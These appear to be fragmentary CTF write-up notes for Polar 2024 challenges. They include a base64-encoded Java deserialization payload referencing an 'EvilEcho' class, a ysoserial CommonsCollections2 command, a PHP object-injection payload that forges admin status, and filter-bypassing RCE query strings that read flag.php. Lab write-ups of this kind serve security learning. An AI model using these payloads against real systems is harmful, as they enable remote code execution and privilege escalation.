aGtNQ1IySkdNNUpHTmxKR0ZtSkdGaUpEaGhKR0l6ZUNRNE55UmxZU1JoWlNSaE4wWWtXaVJ4SkdSaUpEaGtXU1E1TkNRNU9DUTROSGRWSkdKakpEZzNKR1kzVlNRM1l5UTRNSE1rY1NScEpHUmpKR1JtSkdGbUpHVXlReVEzWTBRa09XUWtWQ1JrTjBra2VpUXpaV0pZY1hja09ESWtPR1VrYUhVa1ZpUmxOeVJtTVRFa1pqRWtSU1I1SkRsbGFWRWtlQ1JsTnlRMVkyUWtNMk1rWXpNa09HTWtkSFVrWTJRa1lqSkVKSFlrSkNSaE9DUm1PQ1JGSkRsbUpHRmhKR1k0SkUwa09XWkxKR1k0UWlSak5VVWtOMk1rZGlSTEpEZGxKRGc1Ympna1pHVWtZVGtrWlRJa2VDUTNZeVJoWkNSbE1pUm9KR1V4SkhjNFptWWtZelFrWXpWQkpHUmtKR0kwSkhwS0pHSmhaaVE1WlZaVGNTUmFKR1JtTWlSaFl5UmlZeVJtTnlSaE1ERTBKR1JqYlhwS0pHRXdKRmtrT1Rod0pFa2tiR3BKSkROa0pHVXpPQ1JrWXlSbU1pUkxKR1UzSkdSaGFITWtaVEpPSkhwcUpHWTBKRE5oSkVNMEpHUm1heVJpT1NSalpVa2taRGdrTTJVa1lqZ2tPVEVrVXlSbU5TUnZKRGt4SkdJd0pEazVWeVEwTUNSak5URnBKRGt6SkdVelVFRWtZVE56SkdNM2JpUmpaU1E0WkNSbFpDUTNaVUVrVEZra1pXTWtPVGtrWXpkbWVDUTRaVTBrWmpNa04yWWtZbVFrYnlSdUpHTXpKRGxoSkdJMkpHRTNKRWtrWldNa05XUWtaREVrWWpsUEpHTTVKR1l3SkRWalZpUm1NeVEzWXlSUVRqVWtZelVrWkRRa1kyUjFVM01rWmpob0pHNGtZalpLSkRrM0pEZGlKRGxrSkdKaEpHTmxKRFZrSkdRM0pHWXdKRGxtSkdNNEpHVTRNU1JtTVNSaFpTUlhKR1kzSkdVd0pIWWtaRGNrWlRNa2RpUTNaaVI1SkU4NWRpUTVZU1F6WWlSa1pTUjJKRGcySkdJMUpHWTNKR013SkdVeEpHUTJKRGhpVkNSbE1TUmtPVWNrWkRKa0pHUTBKR0UxSkRnNUpFSWtkaVJoWkNSa05pUjZKSEpaVENSaE4yWllKRVVrWmpBa1pESWtaVElrT0dJa1ltSWtjelFrZENSMlppUmpOQ1JrTW5ra04ySWtaak14VWlSVlpTUm1OU1I0VVRNa1lqY2tPVElrWldRa09EVWtZMlVrWTJVa1lqRWtUMmNrZVNSalprZ2tWa1lrWWpod0pHRTRKSGd4SkdOaUpHSXpKR001TUNSak1HYzVKR05rVFRRa00yRWtZMllrWW1KYWJFRWtVU1JKSkdJMFNpUTFaQ1JsTlNRNU9TUk5KRXdrWXpra1pEVWtOMlVrZUNRNVpDUm1NU1JqT0NRNU1tc2tPRFJhSkRka0pHTXhKRGxrWVNSak55UTRZaVJGWkNSa1pTUlJKRGxrVnlSdEpHUXdWek1rSkNSbFppUmxOaVJoTmlRNU1TUlRKRjhrU2lSak15UmlZU1JpWW1Na05XUWtNMk1rWXpJa2J5UktKRGhpSkdaaEpEbGtKRGhoU2xFa1pUUWtheVJtWVNSQ1J5UmtNeVIySkdVM0pHTTJhSE5wVmlSR1VTUTRaaVJqT1ZNMFN5UmxaR2drWXpJa1J5Um1ZU1ExWkNSWEpEZG1KRXdrWXpBa1l6UXpUelJPSkdFM09DUmhaQ1E0WXlSa05pUTJNQ1JqWWxVa1lqQWtlRGtrWmpFa2N5UmhNaVJoTVNScE15UTRORllrWVRJa1lXRWtZV1lrT0RBa1kyUWtaRGhDSkdGaVRDUnNKRlY1SkdVekpFWWtaR1lrWkRNa09UVWtWaVJCSkdRekpHRm1ZVUVrVjJVa1pURWtOREFrVnlSak1TUkVKSG9rWlRGUUpHUTVkVWhaSkdNNEpEZzVKR1kxSkRoamRpUmxOVmtrZFNRM1pIa2tPRFVrUzE5QkpIb2tkU1JpTkNRNE5DUjRKR1l6SkdSaUpHWmxKR1kxSkdna1pqSWtZbUZ0SkRneEpEaGtKR0kzSkdJMkpHTXhKR0pqSkdSa1FpUmlNaVJNVnlSbU9TUmhZU1E0WWlSa1lVSjViaVJpTlNSbE1DUTROaVJFSkdNMEpHb2tkeVJNSkdRM0pIRWtPRFZJSkRoaFNDUlZSRzBrY1NSbE5DUmtNMGdrWVRCd0pEa3pKR2trT1RFa2IwRlNKSG9rZENSa05TUXpZVkpWSkRkbFFrMGtOV0o1SkdVNEpETmhVU1J5SkdKakpHWTRKR2NrWldFa1lqTm9KRWxISkdJeVdISWtheVJsTVNRNE9DUnZkQ1J2U2lSdEpHSmpOSGtrV2xVa1pUSWtZamdrZVhja05XTk9OQ1JaSkhaUFJpUmxOQ1I1SkdWbEpFd2tZV1lrZFNSbU5pUnBKRGt4Skdaa0pHTmlKRGRtUkNSbE15UmtNRFUwUlNRNU5DUjVWbVlrWWpFa1pXRWtkMVlrT0Rja1pEZGtKR0l4TmlRNFluVWtZeklrWlRra1lUQnZKRm9rWTJSbkpGTWtPVEVrWmpNa1pURWtaVFVrWmpra1kyUnpKR1k0SkRrM1VTUTNaU1JoTUNSeUpEaGlKR1kxSkRnelYwUWtVaVJrT0NSUkpETmlUaVJzU21Va1lqa2tVemxZUmlSaU5DUTVZeVJqWVNSaE15UmhNQ1E1WlNSallTUmtNQ1JGSkdZeEpEbGhWMklrZENSWEpHRXlKRXhWSkdVNEpHTTNKRzhrVFNSaE1TUm5OaVJqTWpoRFgyaG5VU1E0WW5Na1lUZ2tZek1rY2lSNUpFY2taVFVrT0dJa2FHZ2tZekFrWHlRNE9DUmxNRGNrZVNSak1TUmxablFrWkRja2JGZ2tPR1VrTTJZa1lqRWtReVEzWmlSaE15UTVNVFVrWVRNa09EbDFZaVJ5Skdna1l6SWtaeVJtTWlSaU9DUTRZU1E1WkNSak1HbzJKRGd5SkdJMUpHSTVkamhOSkRkbFZDUmtOaVE0TjIwa1pEaE9KR0UzZWlSaU5pUllKRE5pSkdNNEpIUWtjQ1E0WWlRNVpDUmtPQ1E0TlRacUpHRXdKQ1FrWWpZa1dTUmxaQ1JqTkNSNFF5UXpaaVJoWWlRME1DUklKR1l4SkVNa1dTUmhNaVJtTUNSbFppUmhOeVExWkNRNU1DUmxNaVJtT1NSTUpHSmlTU1JuSkdFeUpHRTRKRGRsSkdNMUpFUWtZalFrT1RNa2RTUmhOaVI1SkdZMkpEa3dWQ1JoTmlSak9DUWtKR0V5SkZRa04ySWtkaVJoWmlSb0pHSTRKRFF3ZVhSREpHNGtaV1pCSkdZMEpEWXdKR3g1SkRkaUpEa3dKR1psSkdJM0pIQndKRGt6SkVNa1lXVWtPVEFrWkRBa2VHRWtZbVlrT0RRa09EY2tTeVJrTkNSa1ppUm1PQ1JtWWlSRUpGTWtVeVEwTUNSak5VMUNKRGc1SkRZd0pEa3pKR1F3SkZna1lUUWtTU1JtWW5Na1pXUWtOMlFrWmpCZlp5Um1PV29rYXlSWkpFd2tRU1JCQVFBeFkyOXRMbk4xYmk1dmNtY3VZWEJoWTJobExtSmpaV3d1YVc1MFpYSnVZV3d1ZFhScGJDNURiR0Z6YzB4dllXUmxjZ3dBaWdDTEFRQUpiRzloWkVOc1lYTnpEQUNNQUkwSEFJNE1BSThBa0F3QWN3Q1JBUUFVYW1GMllTOXBieTlUWlhKcFlXeHBlbUZpYkdVQkFBZG1iM0pPWVcxbEFRQWxLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBOc1lYTnpPd0VBRm1kbGRFUmxZMnhoY21Wa1EyOXVjM1J5ZFdOMGIzSUJBRE1vVzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5RGIyNXpkSEoxWTNSdmNqc0JBQjFxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlEYjI1emRISjFZM1J2Y2dFQUMyNWxkMGx1YzNSaGJtTmxBUUFuS0Z0TWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQVpLRXhxWVhaaEwybHZMMDkxZEhCMWRGTjBjbVZoYlRzcFZnRUFDM2R5YVhSbFQySnFaV04wQVFBVktFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bFdBUUFRYW1GMllTOXNZVzVuTDFONWMzUmxiUUVBQTI5MWRBRUFGVXhxWVhaaEwybHZMMUJ5YVc1MFUzUnlaV0Z0T3dFQUVHcGhkbUV2ZFhScGJDOUNZWE5sTmpRQkFBcG5aWFJGYm1OdlpHVnlBUUFIUlc1amIyUmxjZ0VBREVsdWJtVnlRMnhoYzNObGN3RUFIQ2dwVEdwaGRtRXZkWFJwYkM5Q1lYTmxOalFrUlc1amIyUmxjanNCQUF0MGIwSjVkR1ZCY25KaGVRRUFCQ2dwVzBJQkFCaHFZWFpoTDNWMGFXd3ZRbUZ6WlRZMEpFVnVZMjlrWlhJQkFBWmxibU52WkdVQkFBWW9XMElwVzBJQkFBVW9XMElwVmdFQUUycGhkbUV2YVc4dlVISnBiblJUZEhKbFlXMEJBQWR3Y21sdWRHeHVBUUFWS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsV0FRQVBjSEpwYm5SVGRHRmphMVJ5WVdObEFRQUlaMlYwUTJ4aGMzTUJBQk1vS1V4cVlYWmhMMnhoYm1jdlEyeGhjM003QVFBSloyVjBUV1YwYUc5a0FRQkFLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PMXRNYW1GMllTOXNZVzVuTDBOc1lYTnpPeWxNYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2VFdWMGFHOWtPd0VBR0dwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDAxbGRHaHZaQUVBQm1sdWRtOXJaUUVBT1NoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0YlRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QUNFQUh3QUlBQUVBSUFBQUFBTUFBUUFoQUNJQUFRQWpBQUFBTHdBQkFBRUFBQUFGS3JjQUFiRUFBQUFDQUNRQUFBQUdBQUVBQUFBWUFDVUFBQUFNQUFFQUFBQUZBQ1lBSndBQUFBa0FLQUFwQUFFQUl3QUFBUm9BQlFBR0FBQUFXYnNBQWxtM0FBTk1FZ1M0QUFWTkxBTzlBQWEyQUFjRHZRQUl0Z0FKVHJzQUNsbTNBQXM2QkxzQURGa1pCTGNBRFRvRkdRVXR0Z0FPc2dBUHV3QVFXYmdBRVJrRXRnQVN0Z0FUdHdBVXRnQVZwd0FJVFN5MkFCZXhBQUVBQ0FCUUFGTUFGZ0FFQUNRQUFBQXVBQXNBQUFBYUFBZ0FIQUFPQUIwQUhnQWVBQ2NBSHdBeUFDQUFPQUFoQUZBQUpRQlRBQ01BVkFBa0FGZ0FKZ0FsQUFBQVNBQUhBQTRBUWdBcUFDc0FBZ0FlQURJQUxBQXRBQU1BSndBcEFDNEFMd0FFQURJQUhnQXdBREVBQlFCVUFBUUFNZ0F6QUFJQUFBQlpBRFFBTlFBQUFBZ0FVUUEyQURjQUFRQTRBQUFBREFBQkFBNEFRZ0FxQURrQUFnQTZBQUFBRXdBQy93QlRBQUlIQURzSEFEd0FBUWNBUFFRQUFnQStBRDhBQWdBakFBQUF5Z0FHQUFZQUFBQklFaGhORWhtNEFBVUR2UUFHdGdBSEE3MEFDTFlBQ2NBQUFrNHR0Z0FhRWhzRXZRQUdXUU1TRUZPMkFCdzZCQmtFTFFTOUFBaFpBeXhUdGdBZHdBQUdPZ1VaQmJZQUhsZXhBQUFBQXdBa0FBQUFHZ0FHQUFBQUtBQURBQ29BR2dBdEFDNEFNQUJCQURFQVJ3QXlBQ1VBQUFBK0FBWUFBQUJJQUNZQUp3QUFBQUFBU0FCQUFFRUFBUUFEQUVVQVFnQkRBQUlBR2dBdUFFUUFOd0FEQUM0QUdnQkZBRVlBQkFCQkFBY0FSd0FyQUFVQU9BQUFBQXdBQVFCQkFBY0FSd0E1QUFVQVNBQUFBQVFBQVFBV0FBSUFTUUFBQUFJQVNnQitBQUFBQ2dBQkFGNEFXd0I5QUFrPXQADkV2aWxFY2hvLmNsYXNzc3IAPm9yZy5hc3BlY3RqLndlYXZlci50b29scy5jYWNoZS5TaW1wbGVDYWNoZSRTdG9yZWFibGVDYWNoaW5nTWFwO6sCH0tqVloCAANKAApsYXN0U3RvcmVkSQAMc3RvcmluZ1RpbWVyTAAGZm9sZGVycQB%2BAAF4cgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHgAAAGZs8rEqgAAAAF0AC4vdXNyL2xpYi9qdm0vamF2YS04LW9wZW5qZGstYW1kNjQvanJlL2NsYXNzZXMv

payload run cmd

/read

.........<same as above>.......
cmd: ls
Connection: keep-alive

obj=rO0ABXNyAAhFdmlsRWNob2turzAL9eh9AgAAeHA%3D

SnakeYaml

500 分 5 Polar币

【2024秋季个人挑战赛】打c3p0二次反序列化回显

fangyifang

java -jar ysoserial.jar CommonsCollections2 "ls" > d:/ctf/tmp/ls.ser

投喂

100 分 1 Polar币

【2024秋季个人挑战赛】

<?php
class User{
    public  $username="admin"; public$ is_admin=true;
}
 $a=new User();$ payload=serialize( $a); echo$ payload;
?>

output:

O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"is_admin";b:1;}

data=data=O:4:”User”:2:{s:8:”username”;s:5:”admin”;s:8:”is_admin”;b:1;}

ezUtil

500 分 5 Polar币

【2024冬季个人挑战赛】

fangyifang

狗黑子的RCE

100 分 1 Polar币

【2024冬季个人挑战赛】

gouheizi2=gougouheiziheizi

?gouheizi1=l\s /

?gouheizi1=c\at /fl\ag.php